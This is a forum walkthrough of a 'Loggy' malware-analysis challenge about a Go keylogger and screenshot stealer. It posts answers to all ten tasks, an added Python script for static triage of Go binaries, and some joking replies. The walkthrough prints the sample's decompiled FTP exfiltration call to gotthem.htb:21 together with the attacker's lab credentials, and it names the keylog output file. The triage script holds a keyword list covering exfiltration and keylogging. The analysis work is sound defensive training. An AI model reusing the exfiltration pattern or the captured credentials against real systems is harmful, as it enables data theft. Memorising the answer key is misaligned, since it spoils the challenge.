Loggy Sherlock
by maggi - Tuesday January 21, 2025 at 02:43 AM
#1
New Sherlock Yaaaaaay!!!!

Please let me know if an answer doesn't work; I probably copied something over wrong.


/* Windows Malware included sooooo use a VM, do not open this one on a windows box you care about */
(use Tsurugi or a Kali or Parrot or windows VM and install Ghidra: problem solved)

This one seems like a good easy Malware Analysis sherlock if you are unfamiliar with Ghidra and wanna mess around

[ Tools Needed ]
Ghidra or something like that
Also probably should add and install the Go Analyzer Extensions

(so the link doesn't get cut down just remove link = and that is the release page)
link=https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases


/* First set of tasks can be answered by looking at that initial summary when you analyze a file */


[ Task 1... What is the SHA-256 hash of this malware binary?  ]

6acd8a362def62034cbd011e6632ba5120196e2011c83dc6045fcb28b590457c

// Just take that Logger.exe
// upload to virus total
// enter hash


[ Task 2... What programming language (and version) is this malware written in? ]

Golang 1.22.3

//When you start a project and import a file in Ghidra....
// It's in that initial summary page-dealy right there before starting to look at things.

Golang go version 1.22.3


[ Task 3... There are multiple GitHub repos referenced in the static strings. Which GitHub repo would most likely suggest the ability of this malware to exfiltrate data? ]

github.com/jlaffaye/ftp

//sooo there is one repo that says ftp....that is not a red flag, it is a neon sign saying "fresh baked malware"
github.com/jlaffaye/ftp v0.2.0 h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=

[Task 4... What dependency, expressed as a GitHub repo, supports Janice’s assertion that she thought she downloaded something that can just take screenshots? ]

github.com/kbinani/screenshot

// uhhhhh it says screenshots and the zip file has a series of screenshots, sooo it's that one

github.com/kbinani/screenshot v0.0.0-20230812210009-b87d31814237 h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=




/* Okay, that's just from opening the file; now onto Part 2: looking inside */




[ Task 5... Which function call suggests that the malware produces a file after execution? ]

WriteFile

//I kept seeing os.OpenFile in the sketchy function sendFilesViaFTP
//annnnnd the sketch function KeyLogger, which will need to write a file, sooooo I kinda just made an educated guess of os.WriteFile as the obvious answer


[Task 6... You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to? ]

gotthem.htb

//decompile sendFilesViaFTP
//Line 72 of the not-obvious sendFilesViaFTP

github.com/jlaffaye/ftp::github.com/jlaffaye/ftp.Dial("gotthem.htb:21",0xe,0,0,0);


[ Task 7... What are the threat actor’s credentials? ]

NottaHacker:Cle@rtextP@ssword


//filter functions for main.
//decompile on main.sendFilesViaFTP
//lines 103-105

                    /* C:/Users/verme/go/loggy/main.go:122 */
  github.com/jlaffaye/ftp::github.com/jlaffaye/ftp.(*ServerConn).Login
            (local_d8,"NottaHacker",0xb,"Cle@rtextP@ssword",0x11);  <--------------------- Not a hacker my ass!



[ Task 8... What file keeps getting written to disk? ]

keylog.txt

// First off you get a file called keylog.txt, buuut let's confirm:
// Line 110 is just one example, in the function sendFilesViaFTP
// It also says it in main.main I think, " = keylog.txt", so that had to be the file
os::os.OpenFile("keylog.txt",10,0,0);


[Task 9... When Janice changed her password, this was captured in a file. What is Janice's username and password? ]

janice:Password123

// decode the keylog.txt
//or get AI to do it; it is not "being lazy", I am merely "optimizing my workflow"
//OR when you cat it out and see a string in plaintext but it is all caps so you must work it out...

[ Task 10... What app did Janice have open the last time she ran the "screenshot app"? ]

solitaire

//looking at all the screenshots included in the zip, annnnd she's got solitaire open, easy
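Added example for the static-triage part of the writeup (Tasks 1 through 4 and 6); this is not maggi's code and not part of the Sherlock files. It pulls the Go version and the dependency list straight out of the `Go buildinf:` blob that the Go linker embeds in every binary (the same data Ghidra's summary page and the Go Analyzer extension surface), hashes the bytes, and pulls `host:port` literals out of the strings. The sample bytes are constructed inline from the strings quoted above so it runs offline; the module path `loggy` and the capability keyword list are placeholders, not something read from the real Logger.exe. Pre-Go-1.18 binaries store pointers instead of inline strings and are reported as unsupported rather than guessed at.

```python
"""Static triage of a Go binary: SHA-256, embedded Go build info, host:port strings.
Added example; the sample bytes are constructed, not the real Logger.exe."""
import hashlib
import re

# Header the Go linker emits: 14-byte magic, pointer-size byte, flags byte.
BUILDINFO_MAGIC = b"\xff Go buildinf:"
FLAG_VERSION_INLINE = 0x2  # Go 1.18+: version/modinfo stored inline at offset 32
# cmd/go wraps the module info text in these 16-byte sentinels.
INFO_START = b"0w\xaf\x0c\x92t\x08\x02A\xe1\xc1\x07\xe6\xd6\x18\xe6"
INFO_END = b"\xf92C1\x86\x18 r\x00\x82B\x10A\x16\xd8\xf2"

# Dependency name fragments mapped to the capability they hint at (constructed list).
CAPABILITY_HINTS = {
    "exfiltration": ("ftp", "sftp", "smtp", "websocket"),
    "collection": ("screenshot", "keylog", "keyboard", "clipboard"),
}


def sha256_hex(data: bytes) -> str:
    """Task 1 style: the hash you would look up on VirusTotal."""
    return hashlib.sha256(data).hexdigest()


def _read_uvarint(buf: bytes, pos: int):
    """Decode a Go binary.Uvarint at pos; return (value, position after it)."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if b < 0x80:
            return value, pos
        shift += 7


def _read_string(buf: bytes, pos: int):
    """Linker string layout: uvarint length followed by the raw bytes."""
    n, pos = _read_uvarint(buf, pos)
    return buf[pos:pos + n], pos + n


def parse_go_buildinfo(data: bytes):
    """Return {'go_version','path','main','deps'} or None if no inline build info."""
    off = data.find(BUILDINFO_MAGIC)
    if off < 0:
        return None
    flags = data[off + 15]
    if not flags & FLAG_VERSION_INLINE:
        return None  # pre-1.18 layout stores pointers to the strings; not handled here
    version, pos = _read_string(data, off + 32)
    modinfo, _ = _read_string(data, pos)
    if modinfo.startswith(INFO_START) and modinfo.endswith(INFO_END):
        modinfo = modinfo[len(INFO_START):-len(INFO_END)]
    info = {"go_version": version.decode(), "path": None, "main": None, "deps": []}
    for line in modinfo.decode().splitlines():  # tab-separated records: path/mod/dep/build
        fields = line.split("\t")
        if fields[0] == "path":
            info["path"] = fields[1]
        elif fields[0] == "mod":
            info["main"] = {"path": fields[1], "version": fields[2]}
        elif fields[0] == "dep":
            info["deps"].append({"path": fields[1], "version": fields[2],
                                 "sum": fields[3] if len(fields) > 3 else ""})
    return info


def flag_capabilities(info) -> dict:
    """Tasks 3/4 style: group dependencies by the capability their name suggests."""
    hits = {}
    for dep in info["deps"]:
        low = dep["path"].lower()
        for capability, words in CAPABILITY_HINTS.items():
            if any(w in low for w in words):
                hits.setdefault(capability, []).append(dep["path"])
    return hits


def find_host_ports(data: bytes) -> list:
    """Task 6 style: hostname:port literals (e.g. an FTP target) among the strings."""
    pattern = rb"[a-z0-9][a-z0-9.-]*\.[a-z]{2,}:\d{1,5}"
    return sorted({m.decode() for m in re.findall(pattern, data, re.IGNORECASE)})


# --- constructed sample so the script runs offline (NOT the real binary) ---
def _uvarint(n: int) -> bytes:
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def build_sample_blob(go_version: str, modinfo_text: str) -> bytes:
    """Assemble a build-info blob in the inline layout (header padded to 32 bytes)."""
    header = BUILDINFO_MAGIC + bytes([8, FLAG_VERSION_INLINE]) + b"\x00" * 16
    mod = INFO_START + modinfo_text.encode() + INFO_END
    return header + _uvarint(len(go_version)) + go_version.encode() + _uvarint(len(mod)) + mod


SAMPLE_MODINFO = (
    "path\tloggy\n"  # module path is a placeholder
    "mod\tloggy\t(devel)\t\n"
    "dep\tgithub.com/jlaffaye/ftp\tv0.2.0\th1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=\n"
    "dep\tgithub.com/kbinani/screenshot\tv0.0.0-20230812210009-b87d31814237"
    "\th1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=\n"
    "build\t-buildmode=exe\n"
)
SAMPLE_BINARY = (b"MZ" + b"\x90" * 64 + build_sample_blob("go1.22.3", SAMPLE_MODINFO)
                 + b"\x00gotthem.htb:21\x00" + b"\x00" * 16)

if __name__ == "__main__":
    print("sha256:", sha256_hex(SAMPLE_BINARY))
    info = parse_go_buildinfo(SAMPLE_BINARY)
    print("go version:", info["go_version"])
    for dep in info["deps"]:
        print("dep:", dep["path"], dep["version"])
    print("capability hints:", flag_capabilities(info))
    print("host:port strings:", find_host_ports(SAMPLE_BINARY))
```

To use it on a real sample, replace `SAMPLE_BINARY` with `open(path, "rb").read()` inside the VM; the keyword hints are only a first pass, so confirm each dependency by reading the functions that import it, as the writeup does with sendFilesViaFTP.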
#2
https://i.postimg.cc/hj4Tr5kx/photo-2024-12-21-19-15-34.jpg
#3
(Jan 22, 2025, 01:33 AM)mazafaka555 Wrote: https://i.postimg.cc/hj4Tr5kx/photo-2024-12-21-19-15-34.jpg

xD

Put me down for a medium and send it to the Fucking Bullshit Investigations head office.
#4
(Jan 22, 2025, 03:09 AM)maggi Wrote:
(Jan 22, 2025, 01:33 AM)mazafaka555 Wrote: https://i.postimg.cc/hj4Tr5kx/photo-2024-12-21-19-15-34.jpg

xD

Put me down for a medium and send it to the Fucking Bullshit Investigations head office.

don't be offended btw. I just found this picture to be hilarious & based on true stories
#5
(Jan 22, 2025, 04:43 AM)mazafaka555 Wrote:
(Jan 22, 2025, 03:09 AM)maggi Wrote:
(Jan 22, 2025, 01:33 AM)mazafaka555 Wrote: https://i.postimg.cc/hj4Tr5kx/photo-2024-12-21-19-15-34.jpg

xD

Put me down for a medium and send it to the Fucking Bullshit Investigations head office.

don't be offended btw. I just found this picture to be hilarious & based on true stories
No worries that one made me laugh. I had to show that to a couple friends.